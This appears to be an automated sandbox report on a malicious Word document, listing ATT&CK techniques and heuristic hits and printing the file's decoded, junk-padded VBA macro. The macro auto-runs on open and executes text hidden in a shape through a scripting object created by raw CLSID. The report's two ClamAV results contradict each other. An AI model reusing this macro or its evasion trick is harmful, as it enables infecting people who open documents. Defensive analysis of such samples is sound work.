Verdict: MALICIOUS (Risk Score 252)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
- T1566.001 Spearphishing Attachment
The sample contains VBA macros that are configured to execute automatically upon opening. These macros leverage the WScript.Shell COM object to invoke cmd.exe, which in turn appears to download and execute a second-stage payload. The obfuscated command line suggests an attempt to download content from multiple URLs and execute it.
Heuristics (9)
- ClamAV: Doc.Malware.Powload-6794695-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Powload-6794695-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- VBA instantiates a dangerous COM class by CLSID (critical, OLE_VBA_GETOBJECT_CLSID_DANGEROUS): VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
  Matched line in script: End Select Set ZZKijTUEO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + JatIQwX) On Error Resume Next
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
  Matched line in script: End Select Set ZZKijTUEO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + JatIQwX) On Error Resume Next
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro
  Matched line in script: Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12509 bytes |

SHA-256: ebd3b826e21b8f0a178abe8b91f77b215a5b07ae99b070be4df57d42c7ecd6ea

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 150 of 239 identifiers look randomly generated (e.g. 'XIZqfYfGWLzjO'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "XIZqfYfGWLzjO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
For Each tCRmww In cjOZubIUH
kTidzb = 112378313 + Oct(199149819) - 145297173 - CBool(68214206 / 158638743) * 210112948 + Log(BWDFEpWI - CLng(42217841)) - 121179680 + Hex(UWaQwB)
Next
Select Case nIlSZJi
Case 313746974
AIanbwB = Cos(85802899)
rWDfl = 31330792
Case 195015284
UJbAA = Sqr(208968723 / CSng(134342122 - Cos(207623383 - 242741274) + viztXIN + Rnd(148788059 - 338837569)))
ijYUNNGf = Hex(IXhoXpZ)
End Select
On Error Resume Next
For Each zbWzcRhHC In VQIIhBfbO
bfAvuww = 285128931 + Oct(328483897) - 269893510 - CBool(230402183 / 233212404) * 262124774 + Log(FVTZhOA - CLng(137751222)) - 125701621 + Hex(wRCYTM)
Next
Select Case OspTTbaF
Case 209804501
qJNPmd = Cos(218375070)
MhGtz = 145696194
Case 46301993
lwcuYX = Sqr(246078164 / CSng(21915691 - Cos(132193451 - 280941349) + ImttTBtKL + Rnd(34774905 - 333976953)))
oVVHif = Hex(tTMGpdc)
End Select
On Error Resume Next
For Each NZVHrkKL In TjuLhH
lVtAMKsU = 259077105 + Oct(175872382) - 96739789 - CBool(35102662 / 198149222) * 290174166 + Log(jNMjf - CLng(284338957)) - 92618784 + Hex(bZKUcwhol)
Next
Select Case iSwlj
Case 174291133
jATQV = Cos(32184809)
TMzjzzbw = 155141669
Case 162786170
aCqPVG = Sqr(252119536 / CSng(194267258 - Cos(6805720 - 311031811) + Ivilhzq + Rnd(305159641 - 210617841)))
UcAQz = Hex(pncku)
End Select
Set zcGIqZF = Shapes("vDinjphmffzs")
On Error Resume Next
For Each MDRDNark In uAGiriYA
mrEdQHZlp = 254285671 + Oct(19122784) - 162367836 - CBool(336891763 / 66175435) * 173302926 + Log(KSISf - CLng(163333038)) - 155647580 + Hex(cNjYMRtTA)
Next
Select Case BWijmJ
Case 201942448
kEhHvqj = Cos(194704665)
PPiLNTFA = 19093991
Case 182887480
ZXtjY = Sqr(248290747 / CSng(53285955 - Cos(26037610 - 121193674) + jwnEoTS + Rnd(143824799 - 123476259)))
sjkdDRBo = Hex(cijhi)
End Select
pJIiAJ = "" + ziJic + jQuHY + zcGIqZF.TextFrame.TextRange.Text + fkmIqnPj + TBpswRJ
On Error Resume Next
For Each KlzYSHp In QhKMTjcLF
voNuPju = 234496582 + Oct(1425250) - 31340175 - CBool(142093183 / 33377164) * 125691362 + Log(sUijbHC - CLng(74975817)) - 338099482 + Hex(zwmqKT)
Next
Select Case BKBPRQ
Case 103785002
QdjHlcL = Cos(92786179)
TwBwjwZk = 269902525
Case 338384224
SzDZjrUuR = Sqr(79108391 / CSng(176429965 - Cos(28057715 - 99123954) + KdTEOl + Rnd(251134105 - 229025172)))
WLRRR = Hex(bicQSC)
End Select
On Error Resume Next
For Each ftkth In HASoPDlQp
SFRous = 156988949 + Oct(76575773) - 86076362 - CBool(188578818 / 122962510) * 131309480 + Log(DaIAcWW - CLng(220659342)) - 189999582 + Hex(joEoFF)
Next
Select Case DHMAZt
Case 251970365
PnVZjEf = Cos(257714439)
ONGCJuS = 200111815
Case 277042021
lzpDSGBZK = Sqr(47967789 / CSng(146232941 - Cos(199003495 - 220110428) + YMiBIwH + Rnd(1979232 - 9859246)))
ZswItNu = Hex(jzAbajD)
End Select
On Error Resume Next
For Each ApwVn In CMELjroC
GmmnTI = 150319400 + Oct(74223059) - 164437374 - CBool(106263990 / 196000478) * 306182640 + Log(aWsjLb - CLng(139535718)) - 156415883 + Hex(iwRthOjrn)
Next
Select Case PrOHz
Case 13310610
rdiXFJum = Cos(250255883)
TAjNhtPI = 264091739
Case 148511364
bIihcZi = Sqr(161598292 / CSng(73405706 - Cos(97771756 - 310491447) + bjrtTYoW + Rnd(50072898 - 310411630)))
NqHqiwzz = Hex(fLQVz)
End Select
Set ZZKijTUEO = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + JatIQwX)
On Error Resume Next
For Each kPvffaG In iXnFZ
TwMcLFH = 106739644 + Oct(49428363) - 184576167 - CBool(190154976 / 113153842) * 161566816 + Log(GYiKm - CLng(68716136)) - 335240117 + Hex(DTQzKq)
Next
Select Case hXPHmUX
Case 152511519
RdPUHS = Cos(18580377)
BCwGpd = 124286432
Case 100634376
FvsMOuQ = Sqr(246946014 / CSng(168943465 - Cos(31805175 - 91061648) + ljjBV + Rnd(296581296 - 65308892)))
iFkQCvIsY = Hex(twrMPbiAD)
End Select
On Error Resume Next
For Each CqlvcV In DXlrz
hzuha = 333954160 + Oct(188842666) - 270372512 - CBool(1665060 / 77100024) * 252099489 + Log(tsJBivHEr - CLng(138430097)) - 201600949 + Hex(jRaWS)
Next
Select Case MoqXm
Case 162925158
GwSmbB = Cos(202943925)
wjcqBsqju = 103417532
Case 80444247
qAIXGW = Sqr(314512782 / CSng(338263058 - Cos(325885581 - 45266167) + FlmYwoR + Rnd(104111737 - 125393019)))
FhizfRLVF = Hex(HaEYFnujF)
End Select
On Error Resume Next
For Each MZzwQnqo In QDooRffIS
azQpnQa = 230397907 + Oct(66222082) - 321930399 - CBool(260581950 / 292594431) * 265421505 + Log(OqnwjQL - CLng(166795692)) - 323400044 + Hex(AozpDniO)
Next
Select Case CVlvkMfqE
Case 212535782
HXPOabrhb = Cos(12874634)
BBdowS = 244782857
Case 204857202
OZulEcu = Sqr(25431236 / CSng(247759652 - Cos(3871274 - 174536033) + tFjcZ + Rnd(229238273 - 97945176)))
wBmwnTk = Hex(vONEZJ)
End Select
On Error Resume Next
For Each FjGpuG In dhSwCGjpz
DzkuJs = 130566134 + Oct(230877970) - 315485465 - CBool(240704876 / 280430972) * 270157331 + Log(KNSBXp - CLng(206175781)) - 274272612 + Hex(JpBLYZvv)
Next
Select Case QVKpwa
Case 160069389
onGzWzoQH = Cos(230948378)
FMASYUnv = 296698585
Case 328270162
unARZT = Sqr(44745590 / CSng(134832990 - Cos(96197724 - 290347221) + bAsijnp + Rnd(87782821 - 311598299)))
qKqHQC = Hex(VLifwTsT)
End Select
Const YqdNOZWNFsO = 0
On Error Resume Next
For Each vHRwKItYm In XkmmqNuC
qmtpjYMI = 5261330 + Oct(337583859) - 28218305 - CBool(16521689 / 250367537) * 113303406 + Log(wJGucPw - CLng(78686759)) - 223488177 + Hex(TzJjrlZjk)
Next
Select Case JBSkZwzs
Case 167638167
ilTMqjGz = Cos(168295996)
taLsMZ = 21015202
Case 188878421
NiVBi = Sqr(107425643 / CSng(304311773 - Cos(284297681 - 144605082) + iQDmzOi + Rnd(210510536 - 317704214)))
KfaHRpiqa = Hex(AuWjLDM)
End Select
On Error Resume Next
For Each jjcwwAsO In YmJLIVNPb
wHtioIC = 131669723 + Oct(297451596) - 260858401 - CBool(167628492 / 130122781) * 24120620 + Log(vKkwwE - CLng(334771589)) - 16762167 + Hex(BvImAHij)
Next
Select Case VPHjqF
Case 267809812
vjzbSFivP = Cos(328242907)
PQXjwWri = 209152702
Case 147033808
MOGJz = Sqr(267054494 / CSng(40785877 - Cos(100795948 - 130272771) + JIISDJiq + Rnd(167446204 - 281235507)))
JtRwwiLK = Hex(WITuTkUIH)
End Select
On Error Resume Next
For Each OfzHou In JwEUAOZXi
biiXh = 190053357 + Oct(140719652) - 98975785 - CBool(238431501 / 184009054) * 52328566 + Log(iwAjiEJ - CLng(188550759)) - 183517849 + Hex(GqWsHVjHt)
Next
Select Case GWbJAth
Case 16663999
sESmdSG = Cos(127611853)
fVNGjk = 156406794
Case 259854236
oVzfd = Sqr(229912357 / CSng(225648339 - Cos(160167525 - 48209067) + qjpWHAi + Rnd(251020476 - 261580179)))
sZACT = Hex(XLAqqlM)
End Select
On Error Resume Next
For Each sBdkdLfBZ In ihuEXJu
jhbnjkV = 342184647 + Oct(35294010) - 149084274 - CBool(163655035 / 118014504) * 252883244 + Log(cWnDuM - CLng(340869608)) - 98673304 + Hex(TlfRFULCd)
Next
Select Case DZNREVsPd
Case 40155471
dHmRE = Cos(154286559)
UPiVRp = 55739726
Case 13121030
TPftT = Sqr(311442042 / CSng(186194380 - Cos(229554633 - 286130372) + EjhBzV + Rnd(58517834 - 230879489)))
iszAzuiOH = Hex(IXJCUZzw)
End Select
On Error Resume Next
For Each QAbrKN In THbVkjE
TiiPqMLTA = 84060069 + Oct(12611690) - 96872909 - CBool(120321703 / 194036103) * 184622630 + Log(wnDBvd - CLng(236748226)) - 108238166 + Hex(LUjbjA)
Next
Select Case rkzSoDw
Case 12798221
hbiIw = Cos(30508862)
fHWzfCzpu = 95623090
Case 331322088
sbrTLYX = Sqr(224383702 / CSng(209110041 - Cos(61910038 - 205578225) + oBvOBFHSH + Rnd(200701511 - 27745161)))
KDzokH = Hex(ZFTJipH)
End Select
On Error Resume Next
For Each jomNUGAW In JjwrZ
BjBrp = 212867215 + Oct(1993251) - 214060530 - CBool(188161058 / 36976412) * 336378897 + Log(Dtzhs - CLng(47427158)) - 327097053 + Hex(ZjzYfKqSu)
Next
Select Case VjAAp
Case 325411059
bSBjH = Cos(64390780)
VFzcC = 179905002
Case 260675052
ubcUjcMfp = Sqr(223196655 / CSng(247638907 - Cos(121503574 - 234528600) + zCDBYR + Rnd(270395754 - 319442234)))
RWpDZN = Hex(PTWioY)
End Select
ZZKijTUEO.Run! pJIiAJ, YqdNOZWNFsO
On Error Resume Next
For Each mDSRNbQ In pwLzCLj
NjzDQSW = 28521830 + Oct(46801003) - 77671906 - CBool(52421925 / 9402214) * 31357133 + Log(Bakjz - CLng(76881356)) - 186922943 + Hex(YvPsovj)
Next
Select Case fDjEF
Case 197606317
WNUhO = Cos(67366311)
TOVjw = 241016264
Case 89213563
OVwmHDo = Sqr(162280576 / CSng(196984544 - Cos(173743803 - 157300997) + jEVAD + Rnd(155565286 - 118291919)))
SdiOQX = Hex(AWHwvpJ)
End Select
On Error Resume Next
For Each iZdpF In Uawli
nUfOqzAic = 285244140 + Oct(156430341) - 38281510 - CBool(128212703 / 172978297) * 325938849 + Log(KKhNjz - CLng(283682856)) - 10685003 + Hex(ZRKqRoPim)
Next
Select Case TrJUFMYZ
Case 260899405
XWfHA = Cos(102563597)
EQOoddPQ = 208631984
Case 277927964
KCIXhkibB = Sqr(275503653 / CSng(187462752 - Cos(8352407 - 48249859) + DzbDmCp + Rnd(15225306 - 19543668)))
SYBqNt = Hex(ZWjOl)
End Select
On Error Resume Next
For Each jjdGlzvfL In KGKYkfCH
MzBNkUs = 84301880 + Oct(6496923) - 289920881 - CBool(318138230 / 157775463) * 204418339 + Log(uWvzF - CLng(212113130)) - 55957420 + Hex(kjlHhwLT)
Next
Select Case kJKttiVt
Case 246511817
kunOQfFPB = Cos(266420009)
zbQhNVbd = 259275296
Case 317289365
hGMOU = Sqr(57297455 / CSng(5257771 - Cos(291846325 - 169393740) + TmYkw + Rnd(114481797 - 139774352)))
cjJfCmh = Hex(LjJuPwziN)
End Select
On Error Resume Next
For Each qTjqwf In EhdAwE
KbXzWJ = 78796853 + Oct(30647158) - 337293845 - CBool(206463953 / 241990802) * 140367273 + Log(wZEFoDLLQ - CLng(39957539)) - 282306390 + Hex(hboZzpXC)
Next
Select Case ipvnvjB
Case 252434425
AGamQf = Cos(192246898)
LtsHtVj = 100545256
Case 270212401
XiBqMTYU = Sqr(233397964 / CSng(62739947 - Cos(113861923 - 295591039) + JZwFkHv + Rnd(72567514 - 59446344)))
ZdiJNkUOY = Hex(wiHSK)
End Select
On Error Resume Next
For Each QNDAKCqz In BamncLM
YStEC = 245489871 + Oct(276736793) - 215207724 - CBool(333296236 / 120790748) * 228769178 + Log(EBAVOGi - CLng(277160228)) - 51330166 + Hex(njOHMVOj)
Next
Select Case oEhGu
Case 82416589
OcNULkIW = Cos(122456823)
aQYVcWBif = 69462747
Case 277720160
ZUSPMuVWu = Sqr(38665808 / CSng(59746427 - Cos(229226672 - 291790028) + cndCa + Rnd(283971110 - 272496274)))
uzKkLi = Hex(XOBpTDsB)
End Select
End Sub